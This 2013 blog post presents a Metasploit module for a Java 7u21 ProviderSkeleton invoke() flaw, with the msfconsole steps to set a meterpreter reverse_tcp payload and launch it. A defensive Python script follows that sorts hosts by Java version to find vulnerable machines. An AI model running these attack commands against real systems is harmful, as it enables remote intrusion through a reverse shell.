All great things are simple, and many can be expressed in single words: freedom, justice, honor, duty, mercy, hope

Wednesday, July 3, 2013

Exploit for Java version 7u21 and earlier

Java Applet ProviderSkeleton Insecure Invoke Method

This module abuses the insecure invoke() method of the ProviderSkeleton class, which allows calling arbitrary static methods with user-supplied arguments. The vulnerability affects Java version 7u21 and earlier.

Exploit Targets

    0 - Generic (Java Payload) (default)
    1 - Windows x86 (Native Payload)
    2 - Mac OS X x86 (Native Payload)
    3 - Linux x86 (Native Payload)

$ msfconsole
msf > use exploit/multi/browser/java_jre17_provider_skeleton
msf exploit(java_jre17_provider_skeleton) > show payloads
msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_jre17_provider_skeleton) > set LHOST [MY IP ADDRESS]
msf exploit(java_jre17_provider_skeleton) > exploit
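
To find machines inside the affected range stated above (7u21 and earlier), the output of `java -version` can be triaged as below. This is an added example, not code from the original post or from Metasploit; the host names and banners are constructed, and reading "and earlier" as covering older major lines such as Java 6 is an assumption.

```python
import re

# From the post: "The vulnerability affects Java version 7u21 and earlier."
LAST_AFFECTED = (7, 21)  # (major, update)

# Legacy scheme printed by Java 8 and older, e.g. "1.7.0_21" or "1.7.0_21-b11".
_LEGACY = re.compile(r'"1\.(\d+)\.\d+(?:_(\d+))?[^"]*"')
# Scheme used from Java 9 onward, e.g. "9", "11.0.2", "17.0.1".
_MODERN = re.compile(r'"(\d+)(?:\.\d+)*[^"]*"')


def parse_java_version(banner):
    """Return (major, update) from `java -version` output, or None."""
    m = _LEGACY.search(banner)
    if m:
        return int(m.group(1)), int(m.group(2) or 0)
    m = _MODERN.search(banner)
    if m:
        return int(m.group(1)), 0
    return None


def triage(inventory):
    """Split {host: banner} into (affected, not_affected, unparsed) host lists."""
    affected, ok, unparsed = [], [], []
    for host, banner in sorted(inventory.items()):
        version = parse_java_version(banner)
        if version is None:
            unparsed.append(host)  # review by hand, do not assume safe
        elif version <= LAST_AFFECTED:
            # Assumption: "and earlier" also covers older major lines (6, 5, ...).
            affected.append(host)
        else:
            ok.append(host)
    return affected, ok, unparsed


# Constructed sample inventory (host names and banners are made up).
SAMPLE = {
    "ws-01": 'java version "1.7.0_21"\nJava(TM) SE Runtime Environment (build 1.7.0_21-b11)',
    "ws-02": 'java version "1.7.0_25"',
    "ws-03": 'java version "1.6.0_45"',
    "ws-04": 'openjdk version "11.0.2" 2019-01-15',
    "ws-05": 'java version "1.7.0"',
    "ws-06": "java: command not found",
}

if __name__ == "__main__":
    for label, hosts in zip(("affected", "not affected", "unparsed"), triage(SAMPLE)):
        print(f"{label}: {', '.join(hosts)}")
```

Hosts in the unparsed list have no recognisable version banner and need a manual check rather than being counted as unaffected.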
